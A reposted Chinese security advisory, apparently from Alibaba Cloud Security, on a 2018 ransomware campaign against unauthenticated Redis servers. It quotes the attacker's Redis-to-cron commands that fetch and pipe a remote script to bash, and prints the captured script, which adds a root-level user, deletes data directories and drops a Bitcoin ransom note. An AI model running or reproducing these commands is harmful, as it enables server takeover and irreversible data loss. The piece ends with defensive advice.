【轉載】Redis最新漏洞,刪庫勒索+跑路!!!

首席提問官發表於2018-09-11

9月10日下午15:06開始,阿里雲官方首次發現一起規模化利用Redis 未授權訪問漏洞進行加密貨幣勒索的事件,阿里雲上防禦系統在攻擊開始的10s內就已開啟全網攔截。
與以往的只是通過算力竊取進行挖礦的攻擊事件不同,此次攻擊者在攻擊之初就是以勒索錢財作為第一目的的,攻擊者無懼暴露,非常猖狂。直接刪除資料、加密資料也意味著攻擊者與防禦者之間已經沒有緩衝地帶,基本的攻防對抗將是赤裸裸的一場刺刀戰。
該高危漏洞早在半年前阿里雲就釋出過預警,但是還是有不少使用者並未進行修改加以重視。阿里雲安全專家提醒使用者參考文末方法,儘快完成漏洞修復或部署防禦,一旦被攻擊成功,整個伺服器的程式和資料都將會被刪除!且很難恢復。
Redis應用簡介
Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。從2010年3月15日起,Redis的開發工作由VMware主持。從2013年5月開始,Redis的開發由Pivotal贊助。
Redis漏洞原理
作為一個記憶體資料庫,redis 可通過週期性配置或者手動執行save命令,將快取中的值寫入到磁碟檔案中。如果redis程式許可權足夠,攻擊者就可以利用它的未授權漏洞來寫入計劃任務、ssh登入金鑰、webshell 等等,以達到執行任意指令的目的。
自2017年12月以來,由於該漏洞已經被大規模利用,如DDG等多個殭屍網路都以該漏洞為目標進行迅速的繁殖和佔領算力,並且各大殭屍網路間都會互相刪除彼此來保證自己對機器算力的掌握。
攻擊過程說明
● 首先攻擊者通過事先的掃描踩點,發現了這些公網可訪問並且未設定密碼的機器
● 攻擊者嘗試連線這些機器,並且執行如下程式碼:

config set dir /var/spool/cron/
config set dbfilename root
config 1 */10 * * * * curl -shttp://103.224.80.52/butterfly.sh | bash
save

通過上述指令,將下載指令碼:http://103.224.80.52/butterfly.sh並將該指令碼寫入到計劃任務中,由計劃任務啟動執行。
由於在分析時,攻擊者感知到我們的反向探查,已經將該指令碼下線。但我們的蜜罐成功抓取到了該指令碼如下:

#!/bin/bash
#*butterfly*
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
userdel -r redis
useradd -o -u 0 -g 0 redis &>/dev/null
echo "abcd-1234-!" |passwd--stdin redis &>/dev/null
rm -rf /root/*
rm -rf /home/*
rm -rf /opt/*
rm -rf /data/*
rm -rf /data*
mkdir -p /data
echo -e "
Warning! 
Your File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop thebackup after 24 hours. You are welcome! 
Mail:dbsecuritys@protonmail.com
BitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny
" > /root/Warning.txt
chmod +x /root/Warning.txt
cp /root/Warning.txt /Warning.txt
cp /root/Warning.txt /data/Warning.txt
echo -e "
Warning! 
Your File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop thebackup after 24 hours. You are

● 攻擊者要求給地址:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny 傳送0.6個比特幣,否則將在24小時之內刪除資料備份。
● 但是從這個指令碼中可以明顯看出,攻擊者根本沒有進行備份,即使被攻擊者給了錢,也是要不回資料的。
截止到9月10日晚8點為止,該地址共收到了0.6個比特幣的轉賬,並且都是在今日進行傳送的,已經有受害者開始轉賬了。

**# 安全建議
● 通過安全組限制對公網對Redis等服務的訪問
● 通過修改redis.conf配置檔案,增加密碼認證,並隱藏重要命令
● 以低許可權執行redis服務等**

原文釋出時間:2018年09月10日
本文作者:
本文來自雲棲社群合作伙伴“阿里雲安全”,瞭解相關資訊可以關注“阿里雲安全”。


相關文章